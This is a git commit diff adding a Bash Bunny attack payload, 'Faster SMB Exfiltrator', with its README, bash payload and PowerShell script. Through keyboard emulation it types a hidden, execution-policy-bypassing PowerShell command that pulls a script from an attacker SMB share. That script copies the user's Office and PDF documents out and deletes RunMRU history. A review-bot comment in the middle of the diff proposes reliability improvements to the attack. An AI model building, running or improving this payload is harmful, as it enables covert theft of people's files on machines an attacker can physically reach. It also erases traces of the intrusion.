commit
50e3d0639f
|
@ -0,0 +1,50 @@
|
||||||
|
# Faster SMB Exfiltrator V 2.0
|
||||||
|
|
||||||
|
* Author: Hak5Darren
|
||||||
|
* Props: ImNatho, mike111b, madbuda, jblk01
|
||||||
|
* Version: Version 1.6.1
|
||||||
|
* Target: Windows XP SP3+ (Powershell)
|
||||||
|
* Category: Exfiltration
|
||||||
|
* Attackmodes: HID, Ethernet
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Exfiltrates select files from users's documents folder via SMB.
|
||||||
|
Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
|
||||||
|
Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired.
|
||||||
|
|
||||||
|
## STATUS
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
| ------------------- | -------------------------------------- |
|
||||||
|
| Red (blinking) | Impacket not found in /pentest |
|
||||||
|
| Yellow Single | Ethernet Stage |
|
||||||
|
| Yellow Double | HID Stage |
|
||||||
|
| Cyan | Receiving files |
|
||||||
|
| White | Moving liberated files to mass storage |
|
||||||
|
| Green | Finished |
|
||||||
|
|
||||||
|
# NOTICE
|
||||||
|
|
||||||
|
As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share.
|
||||||
|
To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files.
|
||||||
|
|
||||||
|
# Starting from a fresh Bash Bunny
|
||||||
|
|
||||||
|
1. apt update ; apt install gcc
|
||||||
|
2. pip install impacket
|
||||||
|
3. cd /tools/
|
||||||
|
4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||||
|
5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||||
|
6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password'
|
||||||
|
|
||||||
|
Both the username and the password have been set as 'user' and 'Password01' respectively.
|
||||||
|
|
||||||
|
# Changes to the payload.txt include:
|
||||||
|
|
||||||
|
* Support for SMB version 2 enabled.
|
||||||
|
* Username and password set to bypass Microsoft's disallowing of anonymous access.
|
||||||
|
* Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.
|
|
@ -0,0 +1,85 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: Faster SMB Exfiltrator version 2.0
|
||||||
|
# Author: Hak5Darren
|
||||||
|
# Props: ImNatho, mike111b, madbuda, jblk01
|
||||||
|
# Version: 1.6.1
|
||||||
|
# Category: Exfiltration
|
||||||
|
# Target: Windows XP SP3+ (Powershell)
|
||||||
|
# Attackmodes: HID, Ethernet
|
||||||
|
#
|
||||||
|
# REQUIREMENTS
|
||||||
|
# ============
|
||||||
|
# SETUP:
|
||||||
|
#
|
||||||
|
# 1. apt update ; apt install gcc
|
||||||
|
# 2. pip install impacket
|
||||||
|
# 3. cd /tools/
|
||||||
|
# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||||
|
# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# LED STATUS
|
||||||
|
# ==========
|
||||||
|
# FAIL........Failed to find dependencies
|
||||||
|
# STAGE1......Ethernet Stage
|
||||||
|
# STAGE2......HID Stage
|
||||||
|
# SPECIAL.....Receiving Files
|
||||||
|
# CLEANUP.....Moving Liberated Files
|
||||||
|
# FINISH......Finished
|
||||||
|
#
|
||||||
|
# OPTIONS
|
||||||
|
# =======
|
||||||
|
# Exfiltration options configured from included s.ps1 script
|
||||||
|
|
||||||
|
|
||||||
|
######## INITIALIZATION ########
|
||||||
|
REQUIRETOOL impacket
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
# Make temporary loot directory
|
||||||
|
mkdir -p /loot/smb/
|
||||||
|
# Delete any old exfiltration data
|
||||||
|
rm -rf /loot/smb/*
|
||||||
|
# Copy new powershell payload to smb share
|
||||||
|
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
|
||||||
|
# Make loot directory on USB Disk
|
||||||
|
mkdir -p /root/udisk/loot/smb_exfiltrator
|
||||||
|
|
||||||
|
|
||||||
|
######## ETHERNET STAGE ########
|
||||||
|
LED STAGE1
|
||||||
|
ATTACKMODE RNDIS_ETHERNET
|
||||||
|
# Start the SMB Server
|
||||||
|
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
|
||||||
|
|
||||||
|
|
||||||
|
######## HID STAGE ########
|
||||||
|
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
|
||||||
|
GET HOST_IP
|
||||||
|
LED STAGE2
|
||||||
|
ATTACKMODE HID RNDIS_ETHERNET
|
||||||
|
RUN WIN powershell
|
||||||
|
Q DELAY 1000
|
||||||
|
Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
|
||||||
|
Q DELAY 500
|
||||||
|
Q ENTER
|
||||||
|
LED SPECIAL
|
||||||
|
# Wait until files are done copying
|
||||||
|
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
||||||
|
|
||||||
|
|
||||||
|
######## CLEANUP ########
|
||||||
|
LED CLEANUP
|
||||||
|
# Delete EXFILTRATION_COMPLETE file
|
||||||
|
rm -rf /loot/smb/EXFILTRATION_COMPLETE
|
||||||
|
# Move files to udisk loot directory
|
||||||
|
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
|
||||||
|
# Clean up temporary loot directory
|
||||||
|
rm -rf /loot/smb/e/*
|
||||||
|
# Sync file system
|
||||||
|
sync
|
||||||
|
|
||||||
|
|
||||||
|
######## FINISH ########
|
||||||
|
# Trap is clean
|
||||||
|
LED FINISH
|
|
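Review bot: The wait loop `while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done` in the HID stage has no upper bound, so if the typed command never executes (locked screen, PowerShell blocked, SMB2 negotiation failure) the payload sits on LED SPECIAL indefinitely with no failure indication; a bounded wait that falls through to `LED FAIL` is a small change, shown below. The `smbserver.py` started in the Ethernet stage is never stopped and its output is appended with `>>` across runs, so `/loot/smbserver.log` grows without bound and keeps every client hostname it has ever seen; capturing `SMB_PID=$!` after the `&` and calling `kill "$SMB_PID"` in CLEANUP would close both. Note also that `rm -rf /loot/smb/*` clears the share between runs but `/loot/smbserver.log` lives outside that directory and is never cleared.

```shell
# … unchanged: LED SPECIAL …
# Wait for the completion marker, but give up after ~5 minutes instead of hanging forever
waited=0
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do
  sleep 1
  waited=$((waited + 1))
  if [ "$waited" -ge 300 ]; then
    LED FAIL
    sync
    exit 1
  fi
done
# … unchanged: CLEANUP …
```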
@ -0,0 +1,9 @@
|
||||||
|
$exfil_dir="$Env:UserProfile\Documents"
|
||||||
|
$exfil_ext="*.docx"
|
||||||
|
$exfil_ext1="*.pdf"
|
||||||
|
$exfil_ext2="*.xlsx"
|
||||||
|
$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
|
||||||
|
mkdir $loot_dir
|
||||||
|
robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z
|
||||||
|
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
|
||||||
|
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|